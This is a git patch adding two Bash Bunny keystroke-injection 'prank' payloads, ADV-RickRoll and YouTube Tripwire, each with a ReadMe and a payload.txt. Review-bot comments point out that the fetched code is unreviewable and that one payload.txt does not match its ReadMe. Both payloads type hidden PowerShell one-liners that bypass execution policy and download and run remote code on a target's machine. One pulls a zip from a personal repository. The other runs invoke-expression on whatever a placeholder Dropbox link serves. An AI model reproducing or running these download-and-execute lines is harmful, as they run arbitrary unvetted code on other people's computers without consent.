+ +# ADV-RickRoll + +A script used to do an advanced rick roll on your target + +## Description + +This program rick rolls your target without opening a muted youtube video +A rick roll video is downloaded and played in your powershell console +when a mouse movement is detected + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1 +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/prank/-BB-ADV-RickRoll/payload.txt b/payloads/library/prank/-BB-ADV-RickRoll/payload.txt new file mode 100644 index 00000000..147d8ad8 --- /dev/null +++ b/payloads/library/prank/-BB-ADV-RickRoll/payload.txt @@ -0,0 +1,18 @@ +* Title: ADV-RickRoll + +* Author: I am Jakoby + +* Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. +* Upon deployment payload will pause until a mouse movement is detected and run once one is. + +* Target: Windows 10, 11 + +* -------------------------------------------------------------------------------------- +* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +* -------------------------------------------------------------------------------------- + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1 +ENTER \ No newline at end of file From b110693304ea82eccce85a577c30f36248063007 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Thu, 13 Oct 2022 22:15:32 -0500 Subject: [PATCH 7/7] New Payload - YouTube Tripwire --- .../library/prank/-BB-YT-Tripwire/ReadMe.md | 116 ++++++++++++++++++ .../library/prank/-BB-YT-Tripwire/payload.txt | 15 +++ 2 files changed, 131 insertions(+) create mode 100644 payloads/library/prank/-BB-YT-Tripwire/ReadMe.md create mode 100644 payloads/library/prank/-BB-YT-Tripwire/payload.txt diff --git a/payloads/library/prank/-BB-YT-Tripwire/ReadMe.md b/payloads/library/prank/-BB-YT-Tripwire/ReadMe.md new file mode 100644 index 00000000..4e711443 --- /dev/null +++ b/payloads/library/prank/-BB-YT-Tripwire/ReadMe.md @@ -0,0 +1,116 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +
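Review bot: The STRING line in ADV-RickRoll/payload.txt downloads `rr.zip` from the `main` branch of a personal repository and runs the `rr.ps1` inside it, but neither file is part of this commit, so the code that executes is not reviewable here and can change after merge without any change to this payload. Include `rr.ps1` in the payload directory, or at least reference a fixed commit instead of `raw/main` and state the expected archive hash in the header comments. The header lines also use `*` where the other payload.txt files in this series use `REM`.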

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# YouTube Tripwire + +Plays any YouTube video after a mouse movement is detected + +## Description + +This script is a one liner that can fit in the runbox by itself +Just replace the URL for the Youtube video and run it +You can now unplug your device and walk away +When your target returns and moves their mouse the video will start playing full screen + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Walk away +* You can run the example snippet below and it will open up a video covering one of my other payloads +``` +powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f') +``` +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/prank/-BB-YT-Tripwire/payload.txt b/payloads/library/prank/-BB-YT-Tripwire/payload.txt
new file mode 100644
index 00000000..0c807e98
--- /dev/null
+++ b/payloads/library/prank/-BB-YT-Tripwire/payload.txt
@@ -0,0 +1,15 @@
+REM Title: YouTube-TripWire
+
+REM Author: I am Jakoby
+
+REM Description: Plays any YouTube video after a mouse movement is detected
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
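Review bot: payload.txt does not match the ReadMe added in the same commit: the ReadMe describes a self-contained one-liner where only the video URL is replaced, while the STRING line here types a download-and-`invoke-expression` command with a placeholder link, and no script for that link to serve is included. As committed, a reader cannot tell what this payload executes. The REM header should state which script the link must point to and that script should be part of the commit, or the file should carry what the ReadMe documents.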